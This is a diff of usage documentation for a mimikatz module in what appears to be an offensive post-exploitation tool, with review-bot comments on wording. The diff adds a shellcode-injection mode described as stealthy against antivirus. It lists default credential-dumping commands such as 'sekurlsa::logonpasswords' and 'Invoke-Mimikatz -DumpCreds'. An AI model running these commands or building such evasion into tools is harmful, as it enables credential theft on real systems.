| skipped 24 lines |
25 | 25 | | |
26 | 26 | | |
27 | 27 | | This module allows you to run mimikatz in a versatile way. |
28 | | - | Within this module it is possible to run mimikatz in 2 different way: |
| 28 | + | Within this module it is possible to run mimikatz in 3 different ways: |
29 | 29 | | 'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory; |
30 | | - | 'exe': the classic mimikatz binary will be uploaded to the server and run with arguments. |
| 30 | + | 'exe': the classic mimikatz binary will be uploaded to the server and run with arguments; |
| 31 | + | 'dll': convert mimikatz dll into a position independent shellcode and inject into a remote process. |
31 | 32 | | It is recommended to run the ps1 version because it will be obfuscated and run from memory. |
32 | 33 | | The exe version will be just dropped as clear and could be catched by av scanners. |
| 34 | + | The dll version is the most stealthy but it doesn't support impersonation atm. |
33 | 35 | | |
34 | 36 | | |
35 | 37 | | Usage: |
36 | 38 | | #mimikatz [exec_type] [username] [password] [domain] [custom_command] |
37 | 39 | | |
38 | 40 | | Positional arguments: |
39 | | - | exec_type type of running mimikatz. |
40 | | - | 'ps1' will upload and execute the powershell version of mimikatz |
41 | | - | 'exe' will upload and execute the classic version of binary mimikatz |
| 41 | + | exec_type execution type for running mimikatz: |
| 42 | + | 'ps1' will upload and execute the powershell version of mimikatz |
| 43 | + | 'exe' will upload and execute the classic version of binary mimikatz |
| 44 | + | 'dll' will inject converted dll shellcode into a remote process |
42 | 45 | | Default: 'ps1' |
43 | 46 | | username username of the user to runas the process |
44 | 47 | | password password of the user to runas the process |
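Review bot: The new sentence at line 34 says the dll version does not support impersonation, but the Usage line and the username/password entries under "Positional arguments" still read as if they apply to every exec_type. State in the argument descriptions what happens when credentials are passed together with 'dll' (rejected with an error, or ignored), so the limitation is visible where the arguments are documented and not only in the intro. The intro also now gives two competing recommendations: line 32 recommends ps1, while line 34 calls dll "the most stealthy"; reword one of them so the guidance is consistent. Minor style points: spell out "atm" as "at the moment", and phrase the 'dll' item at line 31 like the two items above it ("the mimikatz dll will be converted ... and injected ...").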
| skipped 1 lines |
46 | 49 | | custom_command based on exec_type, the custom command could be: |
47 | 50 | | - 'ps1' : powershell code to add to the ps1 mimikatz module; |
48 | 51 | | - 'exe' : command line arguments to the mimikatz binary; |
| 52 | + | - 'dll' : command line arguments to be executed. |
49 | 53 | | Default: |
50 | 54 | | 'ps1': ';Invoke-Mimikatz -DumpCreds' |
51 | 55 | | 'exe': 'privilege::debug sekurlsa::logonpasswords exit' |
| 56 | + | 'dll': 'privilege::debug sekurlsa::logonpasswords exit' |
52 | 57 | | |
53 | 58 | | Examples: |
54 | 59 | | Run mimikatz as the current user |
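Review bot: The 'dll' entry added at line 52, "command line arguments to be executed", is vaguer than the 'exe' entry directly above it, since arguments are passed to something rather than executed. Suggest wording parallel to line 51, for example "- 'dll' : command line arguments to the mimikatz dll;", and keep the list punctuation consistent (the earlier items end with ';'). The 'dll' default at line 56 is identical to the 'exe' default; if that is intentional, a single line such as "'exe' and 'dll': ..." would avoid the two drifting apart later. The Examples section that starts at line 58 should also get at least one 'dll' invocation if it does not have one in the part not shown here.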
| skipped 105 lines |